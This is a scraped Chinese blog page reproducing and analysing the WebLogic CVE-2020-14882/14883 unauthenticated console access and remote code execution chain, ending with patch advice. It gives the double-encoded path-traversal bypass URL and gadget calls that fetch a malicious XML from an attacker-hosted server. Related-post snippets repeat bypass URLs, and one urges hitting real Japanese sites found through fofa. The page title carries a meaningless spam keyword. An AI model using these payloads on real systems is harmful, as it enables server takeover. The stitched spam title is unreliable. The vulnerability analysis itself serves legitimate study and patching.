使用未授权oracle赔偿,Weblogic未授权访问及命令执行分析复现(CVE-2020-14882/14883) - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou....

最新推荐文章于 2023-03-29 19:39:26 发布
最新推荐文章于 2023-03-29 19:39:26 发布
阅读量322 收藏
点赞数
文章标签: 使用未授权oracle赔偿

7b11bc49a6ca2835a1eadec66bf081c0.png

‘%252E%252E%252F’即为二次URL编码过后的‘../’,通过这个就可以实现穿越路径未授权访问相关管理后台

8e5c55bc7954a914edf36fcbe4d52b16.png

任意代码执行复现:

利用上述未授权访问CVE-2020-14882结合CVE-2020-14883

利用方式(一):

通过:

com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext,这种方法最早在CVE-2019-2725被提出,该方法通用于各版本weblogic。

这里首先需要我们构造一个恶意的xml文件,如这里我们自己搭建的http://10.211.55.2:9999/rce-win.xml。

其次需要被攻击的weblogic能够访问我们的恶意xml。8354d8714c4cd478237ed4f6c411ff45.png038baddc73c8188039c894aeeda10621.png

其他gadget:

com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://IP/poc.xml")

利用方式(二):

通过com.tangosol.coherence.mvel2.sh.ShellSession,但此利用方法只能在Weblogic 12.2.1及以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。

我们可以看到在当前10.3.6版本会提示

855ff197395d3c47b0f9bd5f94429ec4.png

当使用12版本测试时,即可测试成功06b0e6f14a68087ff13f4f4ee7399919.png

其他exp:

比如回显的6fd07dbe137c61cd03118213a1b70df7.png

12e0b8b73e8e4bcef95f5d0fa7a35dba.png

调试分析:

首先,通过静态资源文件绕过路径权限的校验。之后weblogic会对提交的url进行两次url解码。最后会将handle中的参数传入HandleFactory执行任意代码。

从绕过路径权限的校验开始。首先weblogic的请求会经过weblogic.servlet.internal.WebAppServletContext#execute处理,这里会调用securedExecute()

637bd0d48a64458642374aaa177a17fc.png

跟进securedExecute,后会调用doSecuredExecute,继续跟进

e6b1f52b753ef1edcdbad4549b301929.png

weblogic.servlet.internal.WebAppServletContext#doSecuredExecute

在这里调用checkAccess进行权限的检查

8b21ee8a36525ab9db75a3428741b382.png

进入weblogic.servlet.security.internal.WebAppSecurity#checkAccess()中可以看到当我们请求的路径为/console/console.portal时,checkAllResources为false

e8d0221b018dd3ec41d575323fc0a657.png

这里跟进weblogic.servlet.security.internal.WebAppSecurityWLS#getConstraint()

0856f586395fa3493995ba31a94a9fa1.png

这里即比较我们的relURI是否匹配我们matchMap中的路径,并判断rcForAllMethods和rcForOneMethod是否为null

c22a919709eeb33584f6d410486c2eef.png

当我们的relURI为/console.portal时,rcForAllMethods不为null,rcForOneMethod为null,所以返回了rcForAllMethods。而对应静态资源就不会有限制和校验

27e76a87bbd946128f68a89945c1bad3.png

接下来回到checkAccess,如果这里是原来的/console.portal时,到这就结束了

64c88b61f44b72e28307a7aa6abb358f.png

如果使用console/images/console.portal则会继续判断resourceConstraint及后续的isAuthorized,并进入weblogic.servlet.security.internal.ChainedSecurityModule#checkAccess

b452f3fbec28345669d3fba2f286296b.png

在weblogic.servlet.security.internal.CertSecurityModule#checkUserPerm中会进入hasPermission校验权限

45cbdea2f8aba7a27c6b75c14777e62d.png

所以当我们这里使用静态资源路径时,unrestrict值就为true

74c4de3ed37bbfd89489abb3dea52570.png

之后会根据web.xml中的配置对应的AsyncInitServlet来到了weblogic.servlet.AsyncInitServlet#service

4ee0fece723e3c1774ffb48338b1c99f.png

这里如果解码后的url里没有;,那么就会继续调用super.service

e6eeae41ef0015a108325e0ccf25677b.png

再次进入super.service()

878a9d507b4586d923b0529525f57cf2.png

最终不管哪种请求都会来到doPost,并在这里调用createUIContext

b71ae6090a68d610716fc1e88f3a6568.png

可以看到此时已经经过了一次解码

193975b3e847c5513195396fe7491e12.png

随后进入getTree又进行了一次解码,此时requestPattern就变成/css/../console.portal

acaa238522fdbf4ebf92d68aff0ecd9c.png

之后来到com.bea.console.utils.BreadcrumbBacking#init类,进入findFirstHandle

d9f48adb4094cdb790d4a89030631e89.png

这里会逐个检查参数中是否有handle并将handle的参数内容提取出来返回

5c6ee92c1f08a55573d953610f5767a2.png

最后将获取到的handleStr作为参数调用HandleFactory.getHandle(handleStr);此时也就来到了代码执行的入口

a1a02c51c8fdca99d6b04f46070ece07.png

此时传进来的handleStr会在这里被拆成两部分,一个作为被实例化的类,另一个作为该类的构造函数参数及实例化,比如java.lang.String('aaaa'),被拆分成java.lang.String和aaaa

87082132c00fd0423df4552ff4e00f8f.png

所以我们就可根据此来构造gadget,最终通过反射机制在此触发

d43ecda3c0c912d0911cc846b22b397d.png

比如当我们构造了恶意gadget后就变成了这样,随后即可触发rce

da42e09efdf1a0a4e43950f4c957b8bc.png

三、修复

目前Oracle官方已发布了最新针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

参考链接:https://www.oracle.com/security-alerts/cpuoct2020.html

在旧版补丁中,使用黑名单过滤,可使用大小写绕过,请更新最新版的补丁,或者如无使用必要可选择关闭console。

懒床上的猫
关注
Weblogic授权访问以及LADP远程代码执行CVE-2021-2109)
hackzkaq的博客
05-14 1501
1.影响版本: WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 实验环境: 攻击机:kalilinux 10.1.1.10 靶机: 10.1.1.109 2.weblogic授权访问: 对目标地址的7001端口直接访问 构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%25
授权访问小结
kakaxi的博客
04-11 1545
总结了一下在日常安全运维过程中,经常会遇到的服务/端口/可能存在的安全风险点。都是非常基础但比较实用的东西,可以给做运维安全的小伙伴一点帮助。 服务名称 端口号 检测项 FTP 21 1.暴力破解帐号密码 2.各类已知的不同ftp服务的漏洞 SSH 22 1.暴力破解账号密码 2.已知的各种安全漏洞 Telnet 23 1.暴力破解帐号密码 2.各种已知的安全漏洞 SMTP 25 1.邮件欺骗,转...
Oracle 云基础设施中的严重漏洞允许授权访问
kafankeji的博客
09-21 182
然而,在技术报告中,Wiz高级软件工程师Elad Gabay表示:“在修补之前,所有 OCI 客户都可能成为了解该漏洞的攻击者的目标。该漏洞由Wiz的安全云专家于6月发现并被称为AttachMe,该漏洞现在正在该公司今天发布的一份咨询中进行讨论。根据Wiz公告,由意识到此缺陷的威胁行为者导致的潜在攻击包括权限提升和跨租户访问。Wiz的技术报告中提供了有关已修补的 Oracle 漏洞的更多信息,包括技术演示。根据云安全专家的说法,该漏洞显示了云租户隔离在任何云基础设施中的重要性。
使用授权oracle赔偿,Oracle人力资源管理系统PeopleSoft授权远程代码执行漏洞解析...
weixin_39696197的博客
04-15 346
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。几个月前,我有幸参与几个Oracle PeopleSoft建设项目的安全审计,审计对象主要为PeopleSoft系列的人力资源管理系统(HRMS)和开发工具包(PeopleTool)。纵观网上关于PeopleSoft的安全资料,除了几个无法证实的CVE漏洞参考之外,就只有ERPSca...
oracle self service,Oracle Passlogix v-GO Self-Service Password Reset授权访问漏洞
weixin_42665255的博客
04-14 184
漏洞起因访问验证错误危险等级低影响系统Oracle Passlogix v-GO Self-Service Password Reset不受影响系统Oracle Passlogix v-GO Self-Service Password Reset 7.0A危害远程攻击者可以利用漏洞以应用程序权限执行任意代码。攻击所需条件攻击者必须访问Oracle Passlogix v-GO Self-Servi...
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883漏洞复现
weixin_48413667的博客
09-22 8091
一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 在2020年10月的更中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883
WebLogic授权命令执行漏洞(CVE-2020-14882-14883)
m0_48520508的博客
11-10 8302
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 Weblogic对比Tomcat 0x01漏洞概述 CVE-2020-14882: 代码执行漏洞 远程攻击者可以构造特殊的HTTP请求,在经身份
weblogic授权访问漏洞复现CVE-2020-14882
Armandhe的博客
06-07 5305
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
CVE-2020-14882​&14883Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
weblogic 授权命令执行漏洞CVE-2020-14882复现
热门推荐
玄道的网安博客
10-29 1万+
简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 漏洞概述 经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 影响版本 Oracle Weblogic Server 10.3.6.0.0 Orac...
weblogic授权访问命令执行复现cve-2020-14882
来到了学渣的博客
11-01 4651
最近的weblogic漏洞很火,直接上手复现一波。也踩了很多坑,比如用docker搭建环境的时候,用不回显payload的话,如何执行命令(所以用有回显的payload是最舒服的最直观的) 漏洞版本主要影响到 Oracle WebLogic Server 版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。 版本12.2.1.3 先执行下现有的payload,可以直接授权面板 ip/console/images/%252E%252E%252Fconsole.p
weblogic管理控制台授权远程命令执行漏洞复现
qq_48744846的博客
04-14 2008
环境搭建 访问http://192.168.43.8:7001/console即可查看到后台登录页面 绕过认证直接访问后台 首先测试权限绕过漏洞CVE-2020-14882),直接访问 http://192.168.43.8:7001/console/css/%252e%252e%252fconsole.portal 直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令: http://y.
CVE-2020-14882~14883(Weblogic RCE)
include_heqile的博客
11-23 477
https://mp.weixin.qq.com/s?__biz=MzkzNTA0NzgyMA==&mid=2247483787&idx=1&sn=9406a10d2f78d20c1dc57b0cf98618db&chksm=c2b2a668f5c52f7e386c84f9e22379e7d4a3e7ee470e07427c4327555d98af7d7f5c103bf353&token=517092499&lang=zh_CN#rd
CVE-2020-14882&14883weblogic授权命令执行漏洞复现
最新发布
二狗的博客
03-29 740
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
oracle授权sql查询,【oracle使用笔记3】sql查询遇到的若干问题总结
weixin_31642733的博客
04-09 419
在整个开发过程当中,sql查询操做的频率比较高,在不一样的业务场景下会出现不一样的查询需求,如下是我在项目中遇到的查询需求,总结一下。sql【查询一】:取查询出的第一条数据oracleselect*from(select * from[tableName] order by [key] asc/desc ) where rownum = 1函数【查询二】:查询数值数据时,小于0...
Oracle授权访问
Cottage驿站
12-28 893
一、为什么要使用oracle授权访问Oracle授权访问控制特定用户只能访问数据库指定访问的内容和权限。 例如,系统A需要访问系统B的数据库erpdev中的表test,如果我们将系统B的访问数据库用户提供给系统A使用,那么系统A将具有控制系统B数据库erpdev的权限,这显然是系统B不想看到的安全隐患。所以,可以通过oracle授权用户来控制系统A访问系统B的权限,来排除这种隐患。例如,
Weblogic授权远程命令执行漏洞CVE-2020-14882&CVE-2020-14883复现
weixin_44533592的博客
03-05 1093
Weblogic授权远程命令执行漏洞CVE-2020-14882&CVE-2020-14883复现 因果 2021.3.5 漏洞简介 WeblogicOracle公司推出的J2EE应用服务器,CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883
shayebudon的博客
12-20 2911
漏洞复现: 首先测试权限绕过漏洞CVE-2020-14882),访问以下URL,即可授权访问到管理后台页面: http://your-ip:7001/console/css/%252e%252e%252fconsole.portal 访问后台后,可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码: 此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过com.tangosol.coherence.mvel2.sh.ShellS...
Weblogic RCE漏洞CVE-2020-14882&14883复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882CVE-2020-14883 被发现,这些漏洞的存在使得授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值